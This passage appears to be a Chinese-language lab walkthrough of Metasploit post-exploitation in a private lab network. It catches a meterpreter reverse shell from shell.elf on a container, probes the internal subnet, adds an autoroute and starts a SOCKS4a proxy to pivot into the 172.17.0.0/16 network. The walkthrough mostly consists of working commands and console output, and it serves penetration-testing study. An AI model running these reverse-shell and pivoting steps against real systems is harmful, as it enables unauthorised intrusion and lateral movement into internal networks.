>
挂起kali本地自己 192.168.56.103:4444
的监听
msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcppayload => linux/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.56.103lhost => 192.168.56.103msf6 exploit(multi/handler) > set lport 4444lport => 4444msf6 exploit(multi/handler) > run
chmod +x ./shell.elf && ./shell.elf
之后查看 kali 是否响应/app # chmod +x ./shell.elf/app # ./shell.elf
shell
调用目标容器系统 shell 进行简单的探查,比如使用 ip a
查看目标容器系统的内网状态,确定其内网网段 172.17.0.3/16
后使用 exit;
退出```txt[*] Started reverse TCP handler on 192.168.56.103:4444[*] Sending stage (3045348 bytes) to 192.168.56.101[*] Meterpreter session 1 opened (192.168.56.103:4444 -> 192.168.56.101:36424) at 2022-10-19 17:38:38 +0800meterpreter > shellProcess 18 created.Channel 1 created.lsDockerfilemain.pyrequirements.txtshell.elftemplatesip a1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWNlink/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft forever6: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UPlink/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ffinet 172.17.0.3/16 brd 172.17.255.255 scope global eth0valid_lft forever preferred_lft foreverexit```
- 将获取的网段
172.17.0.3/16
->172.17.0.0/16
添加路由run autoroute -s 172.17.0.0/16
命令,查看是否成功添加run autoroute -p
meterpreter > run autoroute -s 172.17.0.0/16[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 172.17.0.0/255.255.0.0...[+] Added route to 172.17.0.0/255.255.0.0 via 192.168.56.101[*] Use the -p option to list all active routesmeterpreter > run autoroute -p[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...]Active Routing Table====================SubnetNetmaskGateway--------------------172.17.0.0255.255.0.0Session 1
- 创建成功之后我们将当前的会话挂起,使用
background
是将当前 msf 会话挂起,想重新利用会话使用sessions -i
其中 i 是会话编号
meterpreter > background[*] Backgrounding session 1...
- 继续前面的,使用
use auxiliary/server/socks_proxy
进入代理模块
- 设置服务版本
set VERSION 4a
- 设置 IP
set SRVHOST Kali的IP
- 查看配置是否正确
show options
- 收尾
exploit
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxymsf6 auxiliary(server/socks_proxy) > set VERSION 4aVERSION => 4amsf6 auxiliary(server/socks_proxy) > set SRVHOST 192.168.56.103SRVHOST => 192.168.56.103msf6 auxiliary(server/socks_proxy) > show optionsModule options (auxiliary/server/socks_proxy):NameCurrent SettingRequiredDescription--------------------------------------SRVHOST192.168.56.103yesThe local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT1080yesThe port to listen onVERSION4ayesThe SOCKS version to use (Accepted: 4a, 5)Auxiliary action:NameDescription---------------ProxyRun a SOCKS proxy servermsf6 auxiliary(server/socks_proxy) > exploit[*] Auxiliary module running as background job 0.[*] Starting the SOCKS proxy server
经验总结扩展阅读
- 设置服务版本